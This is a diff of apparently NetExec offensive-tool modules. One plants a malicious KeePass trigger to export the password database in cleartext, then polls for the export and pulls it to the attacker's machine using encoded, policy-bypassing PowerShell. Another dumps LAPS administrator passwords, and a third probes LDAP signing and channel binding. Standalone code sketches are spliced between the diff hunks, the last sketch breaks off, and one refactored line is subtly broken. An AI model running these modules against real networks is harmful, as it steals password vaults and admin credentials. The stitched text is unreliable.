context.log.fail("Unrecognized powershell execution method, use --options to list available parameters")
|
||||||
exit(1)
|
sys.exit(1)
|
||||||
else:
|
else:
|
||||||
self.powershell_exec_method = module_options["PSH_EXEC_METHOD"]
|
self.powershell_exec_method = module_options["PSH_EXEC_METHOD"]
|
||||||
|
|
||||||
|
@ -141,7 +140,6 @@ class NXCModule:
|
||||||
|
|
||||||
def add_trigger(self, context, connection):
|
def add_trigger(self, context, connection):
|
||||||
"""Add a malicious trigger to a remote KeePass config file using the powershell script AddKeePassTrigger.ps1"""
|
"""Add a malicious trigger to a remote KeePass config file using the powershell script AddKeePassTrigger.ps1"""
|
||||||
|
|
||||||
# check if the specified KeePass configuration file exists
|
# check if the specified KeePass configuration file exists
|
||||||
if self.trigger_added(context, connection):
|
if self.trigger_added(context, connection):
|
||||||
context.log.display(f"The specified configuration file {self.keepass_config_path} already contains a trigger called '{self.trigger_name}', skipping")
|
context.log.display(f"The specified configuration file {self.keepass_config_path} already contains a trigger called '{self.trigger_name}', skipping")
|
||||||
|
@ -171,14 +169,13 @@ class NXCModule:
|
||||||
|
|
||||||
# checks if the malicious trigger was effectively added to the specified KeePass configuration file
|
# checks if the malicious trigger was effectively added to the specified KeePass configuration file
|
||||||
if self.trigger_added(context, connection):
|
if self.trigger_added(context, connection):
|
||||||
context.log.success(f"Malicious trigger successfully added, you can now wait for KeePass reload and poll the exported files")
|
context.log.success("Malicious trigger successfully added, you can now wait for KeePass reload and poll the exported files")
|
||||||
else:
|
else:
|
||||||
context.log.fail(f"Unknown error when adding malicious trigger to file")
|
context.log.fail("Unknown error when adding malicious trigger to file")
|
||||||
sys.exit(1)
|
sys.exit(1)
|
||||||
|
|
||||||
def check_trigger_added(self, context, connection):
|
def check_trigger_added(self, context, connection):
|
||||||
"""check if the trigger is added to the config file XML tree"""
|
"""Check if the trigger is added to the config file XML tree"""
|
||||||
|
|
||||||
if self.trigger_added(context, connection):
|
if self.trigger_added(context, connection):
|
||||||
context.log.display(f"Malicious trigger '{self.trigger_name}' found in '{self.keepass_config_path}'")
|
context.log.display(f"Malicious trigger '{self.trigger_name}' found in '{self.keepass_config_path}'")
|
||||||
else:
|
else:
|
||||||
|
@ -186,20 +183,19 @@ class NXCModule:
|
||||||
|
|
||||||
def restart(self, context, connection):
|
def restart(self, context, connection):
|
||||||
"""Force the restart of KeePass process using a Windows service defined using the powershell script RestartKeePass.ps1
|
"""Force the restart of KeePass process using a Windows service defined using the powershell script RestartKeePass.ps1
|
||||||
If multiple process belonging to different users are running simultaneously,
|
|
||||||
relies on the USER option to choose which one to restart"""
|
|
||||||
|
|
||||||
|
If multiple process belonging to different users are running simultaneously, relies on the USER option to choose which one to restart
|
||||||
|
"""
|
||||||
# search for keepass processes
|
# search for keepass processes
|
||||||
search_keepass_process_command_str = 'powershell.exe "Get-Process keepass* -IncludeUserName | Select-Object -Property Id,UserName,ProcessName | ConvertTo-CSV -NoTypeInformation"'
|
search_keepass_process_command_str = 'powershell.exe "Get-Process keepass* -IncludeUserName | Select-Object -Property Id,UserName,ProcessName | ConvertTo-CSV -NoTypeInformation"'
|
||||||
search_keepass_process_output_csv = connection.execute(search_keepass_process_command_str, True)
|
search_keepass_process_output_csv = connection.execute(search_keepass_process_command_str, True)
|
||||||
# we return the powershell command as a CSV for easier column parsing
|
|
||||||
csv_reader = reader(search_keepass_process_output_csv.split("\n"), delimiter=",")
|
# we return the powershell command as a CSV for easier column parsing, skipping the header line
|
||||||
next(csv_reader) # to skip the header line
|
csv_reader = reader(search_keepass_process_output_csv.split("\n")[1:], delimiter=",")
|
||||||
keepass_process_list = list(csv_reader)
|
|
||||||
# check if multiple processes belonging to different users are running (in order to choose which one to restart)
|
# check if multiple processes belonging to different users are running (in order to choose which one to restart)
|
||||||
keepass_users = []
|
keepass_users = [process[1] for process in list(csv_reader)]
|
||||||
for process in keepass_process_list:
|
|
||||||
keepass_users.append(process[1])
|
|
||||||
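A minimal sketch of the header-skipping CSV parse the refactor settles on, fed with a hypothetical ConvertTo-CSV output string:

from csv import reader

# illustrative output of: Get-Process keepass* -IncludeUserName | Select-Object Id,UserName,ProcessName | ConvertTo-CSV -NoTypeInformation
sample_csv = '"Id","UserName","ProcessName"\n"4812","CORP\\alice","KeePass"\n'

csv_rows = reader(sample_csv.split("\n")[1:], delimiter=",")  # [1:] drops the CSV header row
keepass_users = [row[1] for row in csv_rows if row]           # skip the trailing empty line
print(keepass_users)  # ['CORP\\alice']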
if len(keepass_users) == 0:
|
if len(keepass_users) == 0:
|
||||||
context.log.fail("No running KeePass process found, aborting restart")
|
context.log.fail("No running KeePass process found, aborting restart")
|
||||||
return
|
return
|
||||||
|
@ -223,7 +219,7 @@ class NXCModule:
|
||||||
context.log.fail("Multiple KeePass processes were found, please specify parameter USER to target one")
|
context.log.fail("Multiple KeePass processes were found, please specify parameter USER to target one")
|
||||||
return
|
return
|
||||||
|
|
||||||
context.log.display("Restarting {}'s KeePass process".format(keepass_users[0]))
|
context.log.display(f"Restarting {keepass_users[0]}'s KeePass process")
|
||||||
|
|
||||||
# prepare the restarting script based on user-specified parameters (e.g: keepass user, etc)
|
# prepare the restarting script based on user-specified parameters (e.g: keepass user, etc)
|
||||||
# see data/keepass_trigger_module/RestartKeePass.ps1
|
# see data/keepass_trigger_module/RestartKeePass.ps1
|
||||||
|
@ -234,27 +230,28 @@ class NXCModule:
|
||||||
# actually performs the restart on the remote target
|
# actually performs the restart on the remote target
|
||||||
if self.powershell_exec_method == "ENCODE":
|
if self.powershell_exec_method == "ENCODE":
|
||||||
restart_keepass_script_b64 = b64encode(self.restart_keepass_script_str.encode("UTF-16LE")).decode("utf-8")
|
restart_keepass_script_b64 = b64encode(self.restart_keepass_script_str.encode("UTF-16LE")).decode("utf-8")
|
||||||
restart_keepass_script_cmd = "powershell.exe -e {}".format(restart_keepass_script_b64)
|
restart_keepass_script_cmd = f"powershell.exe -e {restart_keepass_script_b64}"
|
||||||
connection.execute(restart_keepass_script_cmd)
|
connection.execute(restart_keepass_script_cmd)
|
||||||
elif self.powershell_exec_method == "PS1":
|
elif self.powershell_exec_method == "PS1":
|
||||||
try:
|
try:
|
||||||
self.put_file_execute_delete(context, connection, self.restart_keepass_script_str)
|
self.put_file_execute_delete(context, connection, self.restart_keepass_script_str)
|
||||||
except Exception as e:
|
except Exception as e:
|
||||||
context.log.fail("Error while restarting KeePass: {}".format(e))
|
context.log.fail(f"Error while restarting KeePass: {e}")
|
||||||
return
|
return
|
||||||
|
|
||||||
def poll(self, context, connection):
|
def poll(self, context, connection):
|
||||||
"""Search for the cleartext database export file in the specified export folder
|
"""Search for the cleartext database export file in the specified export folder
|
||||||
(until found, or manually exited by the user)"""
|
(until found, or manually exited by the user)
|
||||||
|
"""
|
||||||
found = False
|
found = False
|
||||||
context.log.display(f"Polling for database export every {self.poll_frequency_seconds} seconds, please be patient")
|
context.log.display(f"Polling for database export every {self.poll_frequency_seconds} seconds, please be patient")
|
||||||
context.log.display("we need to wait for the target to enter his master password ! Press CTRL+C to abort and use clean option to cleanup everything")
|
context.log.display("we need to wait for the target to enter his master password ! Press CTRL+C to abort and use clean option to cleanup everything")
|
||||||
# if the specified path is %APPDATA%, we need to check in every user's folder
|
# if the specified path is %APPDATA%, we need to check in every user's folder
|
||||||
if self.export_path == "%APPDATA%" or self.export_path == "%appdata%":
|
if self.export_path == "%APPDATA%" or self.export_path == "%appdata%":
|
||||||
poll_export_command_str = "powershell.exe \"Get-LocalUser | Where {{ $_.Enabled -eq $True }} | select name | ForEach-Object {{ Write-Output ('C:\\Users\\'+$_.Name+'\\AppData\\Roaming\\{}')}} | ForEach-Object {{ if (Test-Path $_ -PathType leaf){{ Write-Output $_ }}}}\"".format(self.export_name)
|
poll_export_command_str = f"powershell.exe \"Get-LocalUser | Where {{ $_.Enabled -eq $True }} | select name | ForEach-Object {{ Write-Output ('C:\\Users\\'+$_.Name+'\\AppData\\Roaming\\{self.export_name}')}} | ForEach-Object {{ if (Test-Path $_ -PathType leaf){{ Write-Output $_ }}}}\""
|
||||||
else:
|
else:
|
||||||
export_full_path = f"'{self.export_path}\\{self.export_name}'"
|
export_full_path = f"'{self.export_path}\\{self.export_name}'"
|
||||||
poll_export_command_str = 'powershell.exe "if (Test-Path {} -PathType leaf){{ Write-Output {} }}"'.format(export_full_path, export_full_path)
|
poll_export_command_str = f'powershell.exe "if (Test-Path {export_full_path} -PathType leaf){{ Write-Output {export_full_path} }}"'
|
||||||
|
|
||||||
# we poll every X seconds until the export path is found on the remote machine
|
# we poll every X seconds until the export path is found on the remote machine
|
||||||
while not found:
|
while not found:
|
||||||
|
@ -263,7 +260,7 @@ class NXCModule:
|
||||||
print(".", end="", flush=True)
|
print(".", end="", flush=True)
|
||||||
sleep(self.poll_frequency_seconds)
|
sleep(self.poll_frequency_seconds)
|
||||||
continue
|
continue
|
||||||
print("")
|
print()
|
||||||
|
|
||||||
# once a database is found, downloads it to the attackers machine
|
# once a database is found, downloads it to the attackers machine
|
||||||
context.log.success("Found database export !")
|
context.log.success("Found database export !")
|
||||||
|
@ -274,29 +271,26 @@ class NXCModule:
|
||||||
connection.conn.getFile(self.share, export_path.split(":")[1], buffer.write)
|
connection.conn.getFile(self.share, export_path.split(":")[1], buffer.write)
|
||||||
|
|
||||||
# if multiple exports found, add a number at the end of local path to prevent override
|
# if multiple exports found, add a number at the end of local path to prevent override
|
||||||
if count > 0:
|
local_full_path = f"{self.local_export_path}/{self.export_name.split('.'[0])}_{count!s}.{self.export_name.split('.'[1])}" if count > 0 else f"{self.local_export_path}/{self.export_name}"
|
||||||
local_full_path = self.local_export_path + "/" + self.export_name.split(".")[0] + "_" + str(count) + "." + self.export_name.split(".")[1]
|
|
||||||
else:
|
|
||||||
local_full_path = self.local_export_path + "/" + self.export_name
|
|
||||||
|
|
||||||
# downloads the exported database
|
# downloads the exported database
|
||||||
with open(local_full_path, "wb") as f:
|
with open(local_full_path, "wb") as f:
|
||||||
f.write(buffer.getbuffer())
|
f.write(buffer.getbuffer())
|
||||||
remove_export_command_str = "powershell.exe Remove-Item {}".format(export_path)
|
remove_export_command_str = f"powershell.exe Remove-Item {export_path}"
|
||||||
connection.execute(remove_export_command_str, True)
|
connection.execute(remove_export_command_str, True)
|
||||||
context.log.success('Moved remote "{}" to local "{}"'.format(export_path, local_full_path))
|
context.log.success(f'Moved remote "{export_path}" to local "{local_full_path}"')
|
||||||
found = True
|
found = True
|
||||||
except Exception as e:
|
except Exception as e:
|
||||||
context.log.fail("Error while polling export files, exiting : {}".format(e))
|
context.log.fail(f"Error while polling export files, exiting : {e}")
|
||||||
|
|
||||||
def clean(self, context, connection):
|
def clean(self, context, connection):
|
||||||
"""Checks for database export + malicious trigger on the remote host, removes everything"""
|
"""Checks for database export + malicious trigger on the remote host, removes everything"""
|
||||||
# if the specified path is %APPDATA%, we need to check in every user's folder
|
# if the specified path is %APPDATA%, we need to check in every user's folder
|
||||||
if self.export_path == "%APPDATA%" or self.export_path == "%appdata%":
|
if self.export_path == "%APPDATA%" or self.export_path == "%appdata%":
|
||||||
poll_export_command_str = "powershell.exe \"Get-LocalUser | Where {{ $_.Enabled -eq $True }} | select name | ForEach-Object {{ Write-Output ('C:\\Users\\'+$_.Name+'\\AppData\\Roaming\\{}')}} | ForEach-Object {{ if (Test-Path $_ -PathType leaf){{ Write-Output $_ }}}}\"".format(self.export_name)
|
poll_export_command_str = f"powershell.exe \"Get-LocalUser | Where {{ $_.Enabled -eq $True }} | select name | ForEach-Object {{ Write-Output ('C:\\Users\\'+$_.Name+'\\AppData\\Roaming\\{self.export_name}')}} | ForEach-Object {{ if (Test-Path $_ -PathType leaf){{ Write-Output $_ }}}}\""
|
||||||
else:
|
else:
|
||||||
export_full_path = f"'{self.export_path}\\{self.export_name}'"
|
export_full_path = f"'{self.export_path}\\{self.export_name}'"
|
||||||
poll_export_command_str = 'powershell.exe "if (Test-Path {} -PathType leaf){{ Write-Output {} }}"'.format(export_full_path, export_full_path)
|
poll_export_command_str = f'powershell.exe "if (Test-Path {export_full_path} -PathType leaf){{ Write-Output {export_full_path} }}"'
|
||||||
poll_export_command_output = connection.execute(poll_export_command_str, True)
|
poll_export_command_output = connection.execute(poll_export_command_str, True)
|
||||||
|
|
||||||
# deletes every export found on the remote machine
|
# deletes every export found on the remote machine
|
||||||
|
@ -352,7 +346,7 @@ class NXCModule:
|
||||||
self.extract_password(context)
|
self.extract_password(context)
|
||||||
|
|
||||||
def trigger_added(self, context, connection):
|
def trigger_added(self, context, connection):
|
||||||
"""check if the trigger is added to the config file XML tree (returns True/False)"""
|
"""Check if the trigger is added to the config file XML tree (returns True/False)"""
|
||||||
# check if the specified KeePass configuration file exists
|
# check if the specified KeePass configuration file exists
|
||||||
if not self.keepass_config_path:
|
if not self.keepass_config_path:
|
||||||
context.log.fail("No KeePass configuration file specified, exiting")
|
context.log.fail("No KeePass configuration file specified, exiting")
|
||||||
|
@ -372,19 +366,15 @@ class NXCModule:
|
||||||
sys.exit(1)
|
sys.exit(1)
|
||||||
|
|
||||||
# check if the specified KeePass configuration file does not already contain the malicious trigger
|
# check if the specified KeePass configuration file does not already contain the malicious trigger
|
||||||
for trigger in keepass_config_xml_root.findall(".//Application/TriggerSystem/Triggers/Trigger"):
|
return any(trigger.find("Name").text == self.trigger_name for trigger in keepass_config_xml_root.findall(".//Application/TriggerSystem/Triggers/Trigger"))
|
||||||
if trigger.find("Name").text == self.trigger_name:
|
|
||||||
return True
|
|
||||||
|
|
||||||
return False
|
|
||||||
|
|
||||||
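The rewritten trigger_added() reduces to a single any() over an XPath lookup; a standalone sketch with a hypothetical local copy of the config and an assumed trigger name:

from xml.etree import ElementTree

TRIGGER_NAME = "export database"    # assumed trigger name
CONFIG_PATH = "KeePass.config.xml"  # assumed local copy of the remote KeePass config

root = ElementTree.parse(CONFIG_PATH).getroot()
trigger_present = any(
    trigger.find("Name").text == TRIGGER_NAME
    for trigger in root.findall(".//Application/TriggerSystem/Triggers/Trigger")
)
print(trigger_present)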
def put_file_execute_delete(self, context, connection, psh_script_str):
|
def put_file_execute_delete(self, context, connection, psh_script_str):
|
||||||
"""Helper to upload script to a temporary folder, run then deletes it"""
|
"""Helper to upload script to a temporary folder, run then deletes it"""
|
||||||
script_str_io = StringIO(psh_script_str)
|
script_str_io = StringIO(psh_script_str)
|
||||||
connection.conn.putFile(self.share, self.remote_temp_script_path.split(":")[1], script_str_io.read)
|
connection.conn.putFile(self.share, self.remote_temp_script_path.split(":")[1], script_str_io.read)
|
||||||
script_execute_cmd = "powershell.exe -ep Bypass -F {}".format(self.remote_temp_script_path)
|
script_execute_cmd = f"powershell.exe -ep Bypass -F {self.remote_temp_script_path}"
|
||||||
connection.execute(script_execute_cmd, True)
|
connection.execute(script_execute_cmd, True)
|
||||||
remove_remote_temp_script_cmd = 'powershell.exe "Remove-Item "{}""'.format(self.remote_temp_script_path)
|
remove_remote_temp_script_cmd = f'powershell.exe "Remove-Item "{self.remote_temp_script_path}""'
|
||||||
connection.execute(remove_remote_temp_script_cmd)
|
connection.execute(remove_remote_temp_script_cmd)
|
||||||
|
|
||||||
def extract_password(self, context):
|
def extract_password(self, context):
|
||||||
|
|
|
@ -1,9 +1,8 @@
|
||||||
#!/usr/bin/env python3
|
|
||||||
# -*- coding: utf-8 -*-
|
|
||||||
import json
|
import json
|
||||||
|
|
||||||
from impacket.ldap import ldapasn1 as ldapasn1_impacket
|
from impacket.ldap import ldapasn1 as ldapasn1_impacket
|
||||||
from nxc.protocols.ldap.laps import LDAPConnect, LAPSv2Extract
|
from nxc.protocols.ldap.laps import LAPSv2Extract
|
||||||
|
|
||||||
|
|
||||||
class NXCModule:
|
class NXCModule:
|
||||||
"""
|
"""
|
||||||
|
@ -16,26 +15,20 @@ class NXCModule:
|
||||||
"""
|
"""
|
||||||
|
|
||||||
name = "laps"
|
name = "laps"
|
||||||
description = "Retrieves the LAPS passwords"
|
description = "Retrieves all LAPS passwords which the account has read permissions for."
|
||||||
supported_protocols = ["ldap"]
|
supported_protocols = ["ldap"]
|
||||||
opsec_safe = True
|
opsec_safe = True
|
||||||
multiple_hosts = False
|
multiple_hosts = False
|
||||||
|
|
||||||
def options(self, context, module_options):
|
def options(self, context, module_options):
|
||||||
"""
|
"""COMPUTER Computer name or wildcard ex: WIN-S10, WIN-* etc. Default: *"""
|
||||||
COMPUTER Computer name or wildcard ex: WIN-S10, WIN-* etc. Default: *
|
|
||||||
"""
|
|
||||||
|
|
||||||
self.computer = None
|
self.computer = None
|
||||||
if "COMPUTER" in module_options:
|
if "COMPUTER" in module_options:
|
||||||
self.computer = module_options["COMPUTER"]
|
self.computer = module_options["COMPUTER"]
|
||||||
|
|
||||||
def on_login(self, context, connection):
|
def on_login(self, context, connection):
|
||||||
context.log.display("Getting LAPS Passwords")
|
context.log.display("Getting LAPS Passwords")
|
||||||
if self.computer is not None:
|
searchFilter = "(&(objectCategory=computer)(|(msLAPS-EncryptedPassword=*)(ms-MCS-AdmPwd=*)(msLAPS-Password=*))(name=" + self.computer + "))" if self.computer is not None else "(&(objectCategory=computer)(|(msLAPS-EncryptedPassword=*)(ms-MCS-AdmPwd=*)(msLAPS-Password=*)))"
|
||||||
searchFilter = "(&(objectCategory=computer)(|(msLAPS-EncryptedPassword=*)(ms-MCS-AdmPwd=*)(msLAPS-Password=*))(name=" + self.computer + "))"
|
|
||||||
else:
|
|
||||||
searchFilter = "(&(objectCategory=computer)(|(msLAPS-EncryptedPassword=*)(ms-MCS-AdmPwd=*)(msLAPS-Password=*)))"
|
|
||||||
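The collapsed conditional above only toggles a (name=...) clause on the same base filter; a short sketch of how the two variants are composed, with a hypothetical computer name:

def build_laps_filter(computer=None):
    # computers carrying either legacy LAPS or Windows LAPS password attributes
    base = "(|(msLAPS-EncryptedPassword=*)(ms-MCS-AdmPwd=*)(msLAPS-Password=*))"
    name_clause = f"(name={computer})" if computer is not None else ""
    return f"(&(objectCategory=computer){base}{name_clause})"

print(build_laps_filter())           # every LAPS-enabled computer
print(build_laps_filter("WIN-S10"))  # single computer, as set by the COMPUTER option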
attributes = [
|
attributes = [
|
||||||
"msLAPS-EncryptedPassword",
|
"msLAPS-EncryptedPassword",
|
||||||
"msLAPS-Password",
|
"msLAPS-Password",
|
||||||
|
@ -52,15 +45,7 @@ class NXCModule:
|
||||||
values = {str(attr["type"]).lower(): attr["vals"][0] for attr in computer["attributes"]}
|
values = {str(attr["type"]).lower(): attr["vals"][0] for attr in computer["attributes"]}
|
||||||
if "mslaps-encryptedpassword" in values:
|
if "mslaps-encryptedpassword" in values:
|
||||||
msMCSAdmPwd = values["mslaps-encryptedpassword"]
|
msMCSAdmPwd = values["mslaps-encryptedpassword"]
|
||||||
d = LAPSv2Extract(
|
d = LAPSv2Extract(bytes(msMCSAdmPwd), connection.username if connection.username else "", connection.password if connection.password else "", connection.domain, connection.nthash if connection.nthash else "", connection.kerberos, connection.kdcHost, 339)
|
||||||
bytes(msMCSAdmPwd),
|
|
||||||
connection.username if connection.username else "",
|
|
||||||
connection.password if connection.password else "",
|
|
||||||
connection.domain,
|
|
||||||
connection.nthash if connection.nthash else "",
|
|
||||||
connection.kerberos,
|
|
||||||
connection.kdcHost,
|
|
||||||
339)
|
|
||||||
try:
|
try:
|
||||||
data = d.run()
|
data = d.run()
|
||||||
except Exception as e:
|
except Exception as e:
|
||||||
|
@ -78,6 +63,6 @@ class NXCModule:
|
||||||
|
|
||||||
laps_computers = sorted(laps_computers, key=lambda x: x[0])
|
laps_computers = sorted(laps_computers, key=lambda x: x[0])
|
||||||
for sAMAccountName, user, password in laps_computers:
|
for sAMAccountName, user, password in laps_computers:
|
||||||
context.log.highlight("Computer:{} User:{:<15} Password:{}".format(sAMAccountName, user, password))
|
context.log.highlight(f"Computer:{sAMAccountName} User:{user:<15} Password:{password}")
|
||||||
else:
|
else:
|
||||||
context.log.fail("No result found with attribute ms-MCS-AdmPwd or msLAPS-Password !")
|
context.log.fail("No result found with attribute ms-MCS-AdmPwd or msLAPS-Password !")
|
||||||
|
|
|
@ -1,5 +1,3 @@
|
||||||
#!/usr/bin/env python3
|
|
||||||
# -*- coding: utf-8 -*-
|
|
||||||
import socket
|
import socket
|
||||||
import ssl
|
import ssl
|
||||||
import asyncio
|
import asyncio
|
||||||
|
@ -12,6 +10,8 @@ from asyauth.common.credentials.ntlm import NTLMCredential
|
||||||
from asyauth.common.credentials.kerberos import KerberosCredential
|
from asyauth.common.credentials.kerberos import KerberosCredential
|
||||||
|
|
||||||
from asysocks.unicomm.common.target import UniTarget, UniProto
|
from asysocks.unicomm.common.target import UniTarget, UniProto
|
||||||
|
import sys
|
||||||
|
|
||||||
|
|
||||||
class NXCModule:
|
class NXCModule:
|
||||||
"""
|
"""
|
||||||
|
@ -28,10 +28,7 @@ class NXCModule:
|
||||||
multiple_hosts = True
|
multiple_hosts = True
|
||||||
|
|
||||||
def options(self, context, module_options):
|
def options(self, context, module_options):
|
||||||
"""
|
"""No options available."""
|
||||||
No options available.
|
|
||||||
"""
|
|
||||||
pass
|
|
||||||
|
|
||||||
def on_login(self, context, connection):
|
def on_login(self, context, connection):
|
||||||
# Conduct a bind to LDAPS and determine if channel
|
# Conduct a bind to LDAPS and determine if channel
|
||||||
|
@ -44,7 +41,7 @@ class NXCModule:
|
||||||
_, err = await ldapsClientConn.connect()
|
_, err = await ldapsClientConn.connect()
|
||||||
if err is not None:
|
if err is not None:
|
||||||
context.log.fail("ERROR while connecting to " + str(connection.domain) + ": " + str(err))
|
context.log.fail("ERROR while connecting to " + str(connection.domain) + ": " + str(err))
|
||||||
exit()
|
sys.exit()
|
||||||
_, err = await ldapsClientConn.bind()
|
_, err = await ldapsClientConn.bind()
|
||||||
if "data 80090346" in str(err):
|
if "data 80090346" in str(err):
|
||||||
return True # channel binding IS enforced
|
return True # channel binding IS enforced
|
||||||
|
@ -57,16 +54,16 @@ class NXCModule:
|
||||||
|
|
||||||
# Conduct a bind to LDAPS with channel binding supported
|
# Conduct a bind to LDAPS with channel binding supported
|
||||||
# but intentionally miscalculated. In the case that an
|
# but intentionally miscalculated. In the case that an
|
||||||
# LDAPS bind without channel binding support has occured,
|
# LDAPS bind without channel binding support has occurred,
|
||||||
# you can determine whether the policy is set to "never" or
|
# you can determine whether the policy is set to "never" or
|
||||||
# if it's set to "when supported" based on the potential
|
# if it's set to "when supported" based on the potential
|
||||||
# error recieved from the bind attempt.
|
# error received from the bind attempt.
|
||||||
async def run_ldaps_withEPA(target, credential):
|
async def run_ldaps_withEPA(target, credential):
|
||||||
ldapsClientConn = MSLDAPClientConnection(target, credential)
|
ldapsClientConn = MSLDAPClientConnection(target, credential)
|
||||||
_, err = await ldapsClientConn.connect()
|
_, err = await ldapsClientConn.connect()
|
||||||
if err is not None:
|
if err is not None:
|
||||||
context.log.fail("ERROR while connecting to " + str(connection.domain) + ": " + str(err))
|
context.log.fail("ERROR while connecting to " + str(connection.domain) + ": " + str(err))
|
||||||
exit()
|
sys.exit()
|
||||||
# forcing a miscalculation of the "Channel Bindings" av pair in Type 3 NTLM message
|
# forcing a miscalculation of the "Channel Bindings" av pair in Type 3 NTLM message
|
||||||
ldapsClientConn.cb_data = b"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
|
ldapsClientConn.cb_data = b"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
|
||||||
_, err = await ldapsClientConn.bind()
|
_, err = await ldapsClientConn.bind()
|
||||||
|
@ -123,15 +120,15 @@ class NXCModule:
|
||||||
_, err = await ldapsClientConn.bind()
|
_, err = await ldapsClientConn.bind()
|
||||||
if "stronger" in str(err):
|
if "stronger" in str(err):
|
||||||
return True # because LDAP server signing requirements ARE enforced
|
return True # because LDAP server signing requirements ARE enforced
|
||||||
elif ("data 52e" or "data 532") in str(err):
|
elif ("data 52e") in str(err):
|
||||||
context.log.fail("Not connected... exiting")
|
context.log.fail("Not connected... exiting")
|
||||||
exit()
|
sys.exit()
|
||||||
elif err is None:
|
elif err is None:
|
||||||
return False
|
return False
|
||||||
else:
|
else:
|
||||||
context.log.fail(str(err))
|
context.log.fail(str(err))
|
||||||
|
|
||||||
# Run through all our code blocks to determine LDAP signing and channel binding settings.
|
# Run through all our code blocks to determine LDAP signing and channel binding settings.
|
||||||
stype = asyauthSecret.PASS if not connection.nthash else asyauthSecret.NT
|
stype = asyauthSecret.PASS if not connection.nthash else asyauthSecret.NT
|
||||||
secret = connection.password if not connection.nthash else connection.nthash
|
secret = connection.password if not connection.nthash else connection.nthash
|
||||||
if not connection.kerberos:
|
if not connection.kerberos:
|
||||||
|
@ -142,15 +139,7 @@ class NXCModule:
|
||||||
stype=stype,
|
stype=stype,
|
||||||
)
|
)
|
||||||
else:
|
else:
|
||||||
kerberos_target = UniTarget(
|
kerberos_target = UniTarget(connection.hostname + "." + connection.domain, 88, UniProto.CLIENT_TCP, proxies=None, dns=None, dc_ip=connection.domain, domain=connection.domain)
|
||||||
connection.hostname + '.' + connection.domain,
|
|
||||||
88,
|
|
||||||
UniProto.CLIENT_TCP,
|
|
||||||
proxies=None,
|
|
||||||
dns=None,
|
|
||||||
dc_ip=connection.domain,
|
|
||||||
domain=connection.domain
|
|
||||||
)
|
|
||||||
credential = KerberosCredential(
|
credential = KerberosCredential(
|
||||||
target=kerberos_target,
|
target=kerberos_target,
|
||||||
secret=secret,
|
secret=secret,
|
||||||
|
@ -162,27 +151,27 @@ class NXCModule:
|
||||||
target = MSLDAPTarget(connection.host, hostname=connection.hostname, domain=connection.domain, dc_ip=connection.domain)
|
target = MSLDAPTarget(connection.host, hostname=connection.hostname, domain=connection.domain, dc_ip=connection.domain)
|
||||||
ldapIsProtected = asyncio.run(run_ldap(target, credential))
|
ldapIsProtected = asyncio.run(run_ldap(target, credential))
|
||||||
|
|
||||||
if ldapIsProtected == False:
|
if ldapIsProtected is False:
|
||||||
context.log.highlight("LDAP Signing NOT Enforced!")
|
context.log.highlight("LDAP Signing NOT Enforced!")
|
||||||
elif ldapIsProtected == True:
|
elif ldapIsProtected is True:
|
||||||
context.log.fail("LDAP Signing IS Enforced")
|
context.log.fail("LDAP Signing IS Enforced")
|
||||||
else:
|
else:
|
||||||
context.log.fail("Connection fail, exiting now")
|
context.log.fail("Connection fail, exiting now")
|
||||||
exit()
|
sys.exit()
|
||||||
|
|
||||||
if DoesLdapsCompleteHandshake(connection.host) == True:
|
if DoesLdapsCompleteHandshake(connection.host) is True:
|
||||||
target = MSLDAPTarget(connection.host, 636, UniProto.CLIENT_SSL_TCP, hostname=connection.hostname, domain=connection.domain, dc_ip=connection.domain)
|
target = MSLDAPTarget(connection.host, 636, UniProto.CLIENT_SSL_TCP, hostname=connection.hostname, domain=connection.domain, dc_ip=connection.domain)
|
||||||
ldapsChannelBindingAlwaysCheck = asyncio.run(run_ldaps_noEPA(target, credential))
|
ldapsChannelBindingAlwaysCheck = asyncio.run(run_ldaps_noEPA(target, credential))
|
||||||
target = MSLDAPTarget(connection.host, hostname=connection.hostname, domain=connection.domain, dc_ip=connection.domain)
|
target = MSLDAPTarget(connection.host, hostname=connection.hostname, domain=connection.domain, dc_ip=connection.domain)
|
||||||
ldapsChannelBindingWhenSupportedCheck = asyncio.run(run_ldaps_withEPA(target, credential))
|
ldapsChannelBindingWhenSupportedCheck = asyncio.run(run_ldaps_withEPA(target, credential))
|
||||||
if ldapsChannelBindingAlwaysCheck == False and ldapsChannelBindingWhenSupportedCheck == True:
|
if ldapsChannelBindingAlwaysCheck is False and ldapsChannelBindingWhenSupportedCheck is True:
|
||||||
context.log.highlight('LDAPS Channel Binding is set to "When Supported"')
|
context.log.highlight('LDAPS Channel Binding is set to "When Supported"')
|
||||||
elif ldapsChannelBindingAlwaysCheck == False and ldapsChannelBindingWhenSupportedCheck == False:
|
elif ldapsChannelBindingAlwaysCheck is False and ldapsChannelBindingWhenSupportedCheck is False:
|
||||||
context.log.highlight('LDAPS Channel Binding is set to "NEVER"')
|
context.log.highlight('LDAPS Channel Binding is set to "NEVER"')
|
||||||
elif ldapsChannelBindingAlwaysCheck == True:
|
elif ldapsChannelBindingAlwaysCheck is True:
|
||||||
context.log.fail('LDAPS Channel Binding is set to "Required"')
|
context.log.fail('LDAPS Channel Binding is set to "Required"')
|
||||||
else:
|
else:
|
||||||
context.log.fail("\nSomething went wrong...")
|
context.log.fail("\nSomething went wrong...")
|
||||||
exit()
|
sys.exit()
|
||||||
else:
|
else:
|
||||||
context.log.fail(connection.domain + " - cannot complete TLS handshake, cert likely not configured")
|
context.log.fail(connection.domain + " - cannot complete TLS handshake, cert likely not configured")
|
||||||
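The two EPA probes above boil down to a small decision table; a hedged sketch of that mapping, detached from the async LDAP plumbing:

def classify_channel_binding(always_check, when_supported_check):
    # always_check: bind WITHOUT EPA support (run_ldaps_noEPA)
    # when_supported_check: bind WITH a deliberately miscalculated EPA value (run_ldaps_withEPA)
    if always_check is True:
        return "Required"
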